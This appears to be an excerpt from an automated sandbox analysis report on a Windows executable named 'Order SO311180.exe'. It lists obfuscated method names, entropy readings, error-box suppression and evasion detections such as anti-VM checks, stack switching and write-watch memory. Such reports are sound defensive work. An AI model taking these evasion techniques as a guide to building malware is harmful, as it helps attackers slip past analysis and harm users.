Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67378 push edx; ret 0_2_06C6737A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67303 push ecx; ret 0_2_06C6730A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67301 push edx; ret 0_2_06C67302
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67339 push edx; ret 0_2_06C6733A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C678E9 push edi; ret 0_2_06C678EA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6786F push esi; ret 0_2_06C67872
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F6C58 push cs; ret 0_2_0E1F6C66
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00425043 push edi; retf 3_2_0042504E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004190E7 push 0000006Ch; retf 3_2_00419103
Source: Order SO311180.exe Static PE information: section name: .text entropy: 7.957120614835864
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, VhQmoBhYwvJdMevmtt.cs High entropy of concatenated method names: 'B0GvUCRkvk', 'qRGv0AnIH2', 'Qy1vwhwURr', 'TB2vJIdnX0', 'CDIvo0bMcR', 'JGEv9k8ZWL', 'puBv6mg254', 'iV2vxGqciD', 'jndvKueMAN', 'vPZvelNljQ'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, h1xevv50gJESsklikI.cs High entropy of concatenated method names: 'CaKwnXAF8', 'jUkJxTV0S', 'Fxn9Gsn3C', 'VTW6EewZn', 'VQ3Kn8j0K', 'hDne5fDq5', 'DZ3knWaubiU1totoJ9', 'UQTUnbJw5LiYRYFWmL', 'qOEI0hBUu', 'HMTcI0CQK'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, jw6QRE8ue2geRlPduC.cs High entropy of concatenated method names: 'bHABJj5fuf', 'rCvB9cmTSR', 'nTmBxTlF6H', 'ltRBKo53TZ', 'pR2BTFS5uh', 'EirBNurPYU', 'LP8BEoFtS8', 'I2tBIVDSuO', 'GJBBaTsLn8', 'ybaBc1btXg'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, zGF2JrqlQbqsOXLOkdP.cs High entropy of concatenated method names: 'KjJaUUHMXH', 'qDFa0PoHN7', 'TQKawlIJ0p', 'BH7aJiqykp', 'uIXaoFqhQK', 'HuPa9Alsxv', 'yZma6ISfGI', 'ndcaxS3v0J', 'WARaKY1aQy', 'op4aeRPfCo'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, UEUEVWNsA1l0bj2VJ5.cs High entropy of concatenated method names: 'gLW3xgxH9H', 'GNf3K1IpAu', 'qfP3mP4TMZ', 'auV3tmqhJO', 'uRJ32RaDeo', 'anu3RqRuZ4', 'oq63ZdYnFa', 'nfD3nMFQlx', 'Nls3PKJ1gK', 'bCm3brogwI'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs High entropy of concatenated method names: 'a7VpfitVUs', 'LY8pML0BtI', 'rtxpGWG1sv', 'qY7pBC1iae', 'ORxpgO2kj2', 'nNbpL0GuMF', 'vZJpvoMlxw', 'PoiplnXElj', 'HospsEbVi5', 'EFJpqGjX6D'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, CyV2BFtQXxDa08Llcm.cs High entropy of concatenated method names: 'JdrIm6DmZ2', 'ht0ItEnbbP', 'TvRI8lAxLp', 'vBsI2IqJZ9', 'JwKIkZGQvl', 'UARIRTANBE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, XkxicO2TYOBMr3ZZaC.cs High entropy of concatenated method names: 'wI0EiiquO4', 'y3rEVexkgg', 'WheIFmAhDB', 'K7yICRTjRy', 'ekEEbL4unl', 'cPtESSxSOn', 'OjiE5pgLkx', 'mE3EkdTq4R', 'entE47foV2', 'aFfEuXgw6F'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, LpW2RWCBqVMcpCI39M.cs High entropy of concatenated method names: 'KoZgoNnfAr', 'aV6g6FtLGn', 'hgSB8lOQHu', 'DW1B2rB2BX', 'pVKBRQ7Ewv', 'AJBByHShlG', 'vUIBZ5N5kZ', 'Rb0BnpFSPv', 'E41Bdyg8kd', 'MEQBPShdfG'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, ueH0lCHcgwgnFJ31nE.cs High entropy of concatenated method names: 'ToString', 'oSqNbDF83K', 'OUUNteuERV', 'dQwN8BllHl', 'elRN2cibn5', 'ueDNR1GyXy', 'MfxNy51htT', 'lMQNZ3yD1m', 'TYjNnJxCgo', 'rGVNdpnqCf'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ahb4n3zGN97IU4WiQ4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YSba3oGZVx', 'K8paTkFThl', 'KSuaN5ahe6', 'KJ7aEKmHGx', 'yHAaI07nUA', 'nbXaaQZchO', 'PU9acdVhdV'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, NLg0j2iGNvyw4kfq4W.cs High entropy of concatenated method names: 'Pv0TPxC9MT', 'jDOTSurtGR', 'qPFTkFZFfQ', 'gKvT4XME9k', 'jb9TtMM0ll', 'cw6T8qO5s1', 'Sq7T2H6GXe', 'dTpTRQUNZe', 'TlWTyw0nDT', 'LeGTZ5cPyW'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, kKWKU8njmvbd5gEyDq.cs High entropy of concatenated method names: 'D9nLf2kfuX', 'V2qLGRduI2', 'QowLgBJLCN', 'jyALv8yR9Z', 'QW5LlZPiJD', 'wSUgHY2DN6', 'q5lghZHOUG', 'wM4g1kXCdE', 'TUXgisAJMD', 'HsHgrliyEQ'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, VCVhdWuWepN0VImAMk.cs High entropy of concatenated method names: 'kk3CvKOdbv', 'TfDClByZJK', 'FulCqT6GI7', 'vZFCAagLxr', 'IFSCToEDqj', 'tacCNH3cQi', 'OIgqudVdghggxxrn5m', 'zSeGWNBx11keAkl5OF', 'DXOCCF9hHn', 'XQNCpGjePZ'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, sqbuO43WG0FOtvbm1R.cs High entropy of concatenated method names: 'NP0IMiaYLI', 'WsFIG1MFf1', 'YiYIB2ZrMF', 'RfjIg93LeD', 'TrBILAsMyC', 'p3pIvbmSD2', 'oDCIlAI4rv', 'DhGIsJF64u', 'FPbIq4G00s', 'fuRIAYF5lj'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, ymwTuyjQrURrxPkjL8.cs High entropy of concatenated method names: 'Dispose', 'GxTCrcitag', 'RfhWtw8Uby', 'YDaQQjNudo', 'OvgCVc3MPO', 'AuGCzYSk9n', 'ProcessDialogKey', 'DEBWFe07Vc', 'kPqWCIbNyh', 'unBWWfPaj1'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, gMUy6FRGv5ka5C1hwu.cs High entropy of concatenated method names: 'Cr6vM3l3PF', 'N01vBRd8Pf', 'rIRvLqvsXk', 'xBwLVptUXP', 'co9Lz7yseB', 'JFwvFCLSpi', 'molvCClihU', 'RSuvWBPdbM', 'IHRvpPOogY', 'zPnvj9mcAo'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, ObuK70sMV3t7BP1BV3.cs High entropy of concatenated method names: 'RW4aCBqFcy', 'zRWapq4kpt', 'SE1aj5Ilhk', 'kVnaMvIpya', 'PijaGO6RUS', 'yQWagWYMBw', 'Bh8aL1JdgS', 'CpJI121d6x', 'KP0IiAUjDo', 'iu6IrJaslP'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs High entropy of concatenated method names: 'UMUGkpaqIU', 'PeJG4DfK19', 'H8lGu4eKwa', 'yO9G7x9s2D', 'sELGHJWsbO', 'pMbGhOp6mL', 'aFHG1jbbKp', 'C1dGiv95UA', 'nDlGrU4rSS', 'dlvGVReRcD'
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ww3g3cqAlGe2WI8tCP2.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a2ZckPba5C', 'pS7c4ccLG3', 'd0CcuVqZFe', 'MMSc7aVqsN', 'Xi1cHvVpC0', 'YVrchWPMKb', 'UYrc1cwT5y'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, VhQmoBhYwvJdMevmtt.cs High entropy of concatenated method names: 'B0GvUCRkvk', 'qRGv0AnIH2', 'Qy1vwhwURr', 'TB2vJIdnX0', 'CDIvo0bMcR', 'JGEv9k8ZWL', 'puBv6mg254', 'iV2vxGqciD', 'jndvKueMAN', 'vPZvelNljQ'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, h1xevv50gJESsklikI.cs High entropy of concatenated method names: 'CaKwnXAF8', 'jUkJxTV0S', 'Fxn9Gsn3C', 'VTW6EewZn', 'VQ3Kn8j0K', 'hDne5fDq5', 'DZ3knWaubiU1totoJ9', 'UQTUnbJw5LiYRYFWmL', 'qOEI0hBUu', 'HMTcI0CQK'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, jw6QRE8ue2geRlPduC.cs High entropy of concatenated method names: 'bHABJj5fuf', 'rCvB9cmTSR', 'nTmBxTlF6H', 'ltRBKo53TZ', 'pR2BTFS5uh', 'EirBNurPYU', 'LP8BEoFtS8', 'I2tBIVDSuO', 'GJBBaTsLn8', 'ybaBc1btXg'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, zGF2JrqlQbqsOXLOkdP.cs High entropy of concatenated method names: 'KjJaUUHMXH', 'qDFa0PoHN7', 'TQKawlIJ0p', 'BH7aJiqykp', 'uIXaoFqhQK', 'HuPa9Alsxv', 'yZma6ISfGI', 'ndcaxS3v0J', 'WARaKY1aQy', 'op4aeRPfCo'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, UEUEVWNsA1l0bj2VJ5.cs High entropy of concatenated method names: 'gLW3xgxH9H', 'GNf3K1IpAu', 'qfP3mP4TMZ', 'auV3tmqhJO', 'uRJ32RaDeo', 'anu3RqRuZ4', 'oq63ZdYnFa', 'nfD3nMFQlx', 'Nls3PKJ1gK', 'bCm3brogwI'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs High entropy of concatenated method names: 'a7VpfitVUs', 'LY8pML0BtI', 'rtxpGWG1sv', 'qY7pBC1iae', 'ORxpgO2kj2', 'nNbpL0GuMF', 'vZJpvoMlxw', 'PoiplnXElj', 'HospsEbVi5', 'EFJpqGjX6D'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, CyV2BFtQXxDa08Llcm.cs High entropy of concatenated method names: 'JdrIm6DmZ2', 'ht0ItEnbbP', 'TvRI8lAxLp', 'vBsI2IqJZ9', 'JwKIkZGQvl', 'UARIRTANBE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, XkxicO2TYOBMr3ZZaC.cs High entropy of concatenated method names: 'wI0EiiquO4', 'y3rEVexkgg', 'WheIFmAhDB', 'K7yICRTjRy', 'ekEEbL4unl', 'cPtESSxSOn', 'OjiE5pgLkx', 'mE3EkdTq4R', 'entE47foV2', 'aFfEuXgw6F'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, LpW2RWCBqVMcpCI39M.cs High entropy of concatenated method names: 'KoZgoNnfAr', 'aV6g6FtLGn', 'hgSB8lOQHu', 'DW1B2rB2BX', 'pVKBRQ7Ewv', 'AJBByHShlG', 'vUIBZ5N5kZ', 'Rb0BnpFSPv', 'E41Bdyg8kd', 'MEQBPShdfG'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, ueH0lCHcgwgnFJ31nE.cs High entropy of concatenated method names: 'ToString', 'oSqNbDF83K', 'OUUNteuERV', 'dQwN8BllHl', 'elRN2cibn5', 'ueDNR1GyXy', 'MfxNy51htT', 'lMQNZ3yD1m', 'TYjNnJxCgo', 'rGVNdpnqCf'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ahb4n3zGN97IU4WiQ4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YSba3oGZVx', 'K8paTkFThl', 'KSuaN5ahe6', 'KJ7aEKmHGx', 'yHAaI07nUA', 'nbXaaQZchO', 'PU9acdVhdV'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, NLg0j2iGNvyw4kfq4W.cs High entropy of concatenated method names: 'Pv0TPxC9MT', 'jDOTSurtGR', 'qPFTkFZFfQ', 'gKvT4XME9k', 'jb9TtMM0ll', 'cw6T8qO5s1', 'Sq7T2H6GXe', 'dTpTRQUNZe', 'TlWTyw0nDT', 'LeGTZ5cPyW'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, kKWKU8njmvbd5gEyDq.cs High entropy of concatenated method names: 'D9nLf2kfuX', 'V2qLGRduI2', 'QowLgBJLCN', 'jyALv8yR9Z', 'QW5LlZPiJD', 'wSUgHY2DN6', 'q5lghZHOUG', 'wM4g1kXCdE', 'TUXgisAJMD', 'HsHgrliyEQ'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, VCVhdWuWepN0VImAMk.cs High entropy of concatenated method names: 'kk3CvKOdbv', 'TfDClByZJK', 'FulCqT6GI7', 'vZFCAagLxr', 'IFSCToEDqj', 'tacCNH3cQi', 'OIgqudVdghggxxrn5m', 'zSeGWNBx11keAkl5OF', 'DXOCCF9hHn', 'XQNCpGjePZ'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, sqbuO43WG0FOtvbm1R.cs High entropy of concatenated method names: 'NP0IMiaYLI', 'WsFIG1MFf1', 'YiYIB2ZrMF', 'RfjIg93LeD', 'TrBILAsMyC', 'p3pIvbmSD2', 'oDCIlAI4rv', 'DhGIsJF64u', 'FPbIq4G00s', 'fuRIAYF5lj'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, ymwTuyjQrURrxPkjL8.cs High entropy of concatenated method names: 'Dispose', 'GxTCrcitag', 'RfhWtw8Uby', 'YDaQQjNudo', 'OvgCVc3MPO', 'AuGCzYSk9n', 'ProcessDialogKey', 'DEBWFe07Vc', 'kPqWCIbNyh', 'unBWWfPaj1'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, gMUy6FRGv5ka5C1hwu.cs High entropy of concatenated method names: 'Cr6vM3l3PF', 'N01vBRd8Pf', 'rIRvLqvsXk', 'xBwLVptUXP', 'co9Lz7yseB', 'JFwvFCLSpi', 'molvCClihU', 'RSuvWBPdbM', 'IHRvpPOogY', 'zPnvj9mcAo'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, ObuK70sMV3t7BP1BV3.cs High entropy of concatenated method names: 'RW4aCBqFcy', 'zRWapq4kpt', 'SE1aj5Ilhk', 'kVnaMvIpya', 'PijaGO6RUS', 'yQWagWYMBw', 'Bh8aL1JdgS', 'CpJI121d6x', 'KP0IiAUjDo', 'iu6IrJaslP'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs High entropy of concatenated method names: 'UMUGkpaqIU', 'PeJG4DfK19', 'H8lGu4eKwa', 'yO9G7x9s2D', 'sELGHJWsbO', 'pMbGhOp6mL', 'aFHG1jbbKp', 'C1dGiv95UA', 'nDlGrU4rSS', 'dlvGVReRcD'
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ww3g3cqAlGe2WI8tCP2.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a2ZckPba5C', 'pS7c4ccLG3', 'd0CcuVqZFe', 'MMSc7aVqsN', 'Xi1cHvVpC0', 'YVrchWPMKb', 'UYrc1cwT5y'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, VhQmoBhYwvJdMevmtt.cs High entropy of concatenated method names: 'B0GvUCRkvk', 'qRGv0AnIH2', 'Qy1vwhwURr', 'TB2vJIdnX0', 'CDIvo0bMcR', 'JGEv9k8ZWL', 'puBv6mg254', 'iV2vxGqciD', 'jndvKueMAN', 'vPZvelNljQ'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, h1xevv50gJESsklikI.cs High entropy of concatenated method names: 'CaKwnXAF8', 'jUkJxTV0S', 'Fxn9Gsn3C', 'VTW6EewZn', 'VQ3Kn8j0K', 'hDne5fDq5', 'DZ3knWaubiU1totoJ9', 'UQTUnbJw5LiYRYFWmL', 'qOEI0hBUu', 'HMTcI0CQK'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, jw6QRE8ue2geRlPduC.cs High entropy of concatenated method names: 'bHABJj5fuf', 'rCvB9cmTSR', 'nTmBxTlF6H', 'ltRBKo53TZ', 'pR2BTFS5uh', 'EirBNurPYU', 'LP8BEoFtS8', 'I2tBIVDSuO', 'GJBBaTsLn8', 'ybaBc1btXg'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, zGF2JrqlQbqsOXLOkdP.cs High entropy of concatenated method names: 'KjJaUUHMXH', 'qDFa0PoHN7', 'TQKawlIJ0p', 'BH7aJiqykp', 'uIXaoFqhQK', 'HuPa9Alsxv', 'yZma6ISfGI', 'ndcaxS3v0J', 'WARaKY1aQy', 'op4aeRPfCo'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, UEUEVWNsA1l0bj2VJ5.cs High entropy of concatenated method names: 'gLW3xgxH9H', 'GNf3K1IpAu', 'qfP3mP4TMZ', 'auV3tmqhJO', 'uRJ32RaDeo', 'anu3RqRuZ4', 'oq63ZdYnFa', 'nfD3nMFQlx', 'Nls3PKJ1gK', 'bCm3brogwI'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs High entropy of concatenated method names: 'a7VpfitVUs', 'LY8pML0BtI', 'rtxpGWG1sv', 'qY7pBC1iae', 'ORxpgO2kj2', 'nNbpL0GuMF', 'vZJpvoMlxw', 'PoiplnXElj', 'HospsEbVi5', 'EFJpqGjX6D'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, CyV2BFtQXxDa08Llcm.cs High entropy of concatenated method names: 'JdrIm6DmZ2', 'ht0ItEnbbP', 'TvRI8lAxLp', 'vBsI2IqJZ9', 'JwKIkZGQvl', 'UARIRTANBE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, XkxicO2TYOBMr3ZZaC.cs High entropy of concatenated method names: 'wI0EiiquO4', 'y3rEVexkgg', 'WheIFmAhDB', 'K7yICRTjRy', 'ekEEbL4unl', 'cPtESSxSOn', 'OjiE5pgLkx', 'mE3EkdTq4R', 'entE47foV2', 'aFfEuXgw6F'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, LpW2RWCBqVMcpCI39M.cs High entropy of concatenated method names: 'KoZgoNnfAr', 'aV6g6FtLGn', 'hgSB8lOQHu', 'DW1B2rB2BX', 'pVKBRQ7Ewv', 'AJBByHShlG', 'vUIBZ5N5kZ', 'Rb0BnpFSPv', 'E41Bdyg8kd', 'MEQBPShdfG'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, ueH0lCHcgwgnFJ31nE.cs High entropy of concatenated method names: 'ToString', 'oSqNbDF83K', 'OUUNteuERV', 'dQwN8BllHl', 'elRN2cibn5', 'ueDNR1GyXy', 'MfxNy51htT', 'lMQNZ3yD1m', 'TYjNnJxCgo', 'rGVNdpnqCf'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ahb4n3zGN97IU4WiQ4.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YSba3oGZVx', 'K8paTkFThl', 'KSuaN5ahe6', 'KJ7aEKmHGx', 'yHAaI07nUA', 'nbXaaQZchO', 'PU9acdVhdV'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, NLg0j2iGNvyw4kfq4W.cs High entropy of concatenated method names: 'Pv0TPxC9MT', 'jDOTSurtGR', 'qPFTkFZFfQ', 'gKvT4XME9k', 'jb9TtMM0ll', 'cw6T8qO5s1', 'Sq7T2H6GXe', 'dTpTRQUNZe', 'TlWTyw0nDT', 'LeGTZ5cPyW'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, kKWKU8njmvbd5gEyDq.cs High entropy of concatenated method names: 'D9nLf2kfuX', 'V2qLGRduI2', 'QowLgBJLCN', 'jyALv8yR9Z', 'QW5LlZPiJD', 'wSUgHY2DN6', 'q5lghZHOUG', 'wM4g1kXCdE', 'TUXgisAJMD', 'HsHgrliyEQ'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, VCVhdWuWepN0VImAMk.cs High entropy of concatenated method names: 'kk3CvKOdbv', 'TfDClByZJK', 'FulCqT6GI7', 'vZFCAagLxr', 'IFSCToEDqj', 'tacCNH3cQi', 'OIgqudVdghggxxrn5m', 'zSeGWNBx11keAkl5OF', 'DXOCCF9hHn', 'XQNCpGjePZ'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, sqbuO43WG0FOtvbm1R.cs High entropy of concatenated method names: 'NP0IMiaYLI', 'WsFIG1MFf1', 'YiYIB2ZrMF', 'RfjIg93LeD', 'TrBILAsMyC', 'p3pIvbmSD2', 'oDCIlAI4rv', 'DhGIsJF64u', 'FPbIq4G00s', 'fuRIAYF5lj'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, ymwTuyjQrURrxPkjL8.cs High entropy of concatenated method names: 'Dispose', 'GxTCrcitag', 'RfhWtw8Uby', 'YDaQQjNudo', 'OvgCVc3MPO', 'AuGCzYSk9n', 'ProcessDialogKey', 'DEBWFe07Vc', 'kPqWCIbNyh', 'unBWWfPaj1'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, gMUy6FRGv5ka5C1hwu.cs High entropy of concatenated method names: 'Cr6vM3l3PF', 'N01vBRd8Pf', 'rIRvLqvsXk', 'xBwLVptUXP', 'co9Lz7yseB', 'JFwvFCLSpi', 'molvCClihU', 'RSuvWBPdbM', 'IHRvpPOogY', 'zPnvj9mcAo'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, ObuK70sMV3t7BP1BV3.cs High entropy of concatenated method names: 'RW4aCBqFcy', 'zRWapq4kpt', 'SE1aj5Ilhk', 'kVnaMvIpya', 'PijaGO6RUS', 'yQWagWYMBw', 'Bh8aL1JdgS', 'CpJI121d6x', 'KP0IiAUjDo', 'iu6IrJaslP'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs High entropy of concatenated method names: 'UMUGkpaqIU', 'PeJG4DfK19', 'H8lGu4eKwa', 'yO9G7x9s2D', 'sELGHJWsbO', 'pMbGhOp6mL', 'aFHG1jbbKp', 'C1dGiv95UA', 'nDlGrU4rSS', 'dlvGVReRcD'
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ww3g3cqAlGe2WI8tCP2.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a2ZckPba5C', 'pS7c4ccLG3', 'd0CcuVqZFe', 'MMSc7aVqsN', 'Xi1cHvVpC0', 'YVrchWPMKb', 'UYrc1cwT5y'
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Order SO311180.exe PID: 3392, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Allocates memory with a write watch (potentially for evading sandboxes)
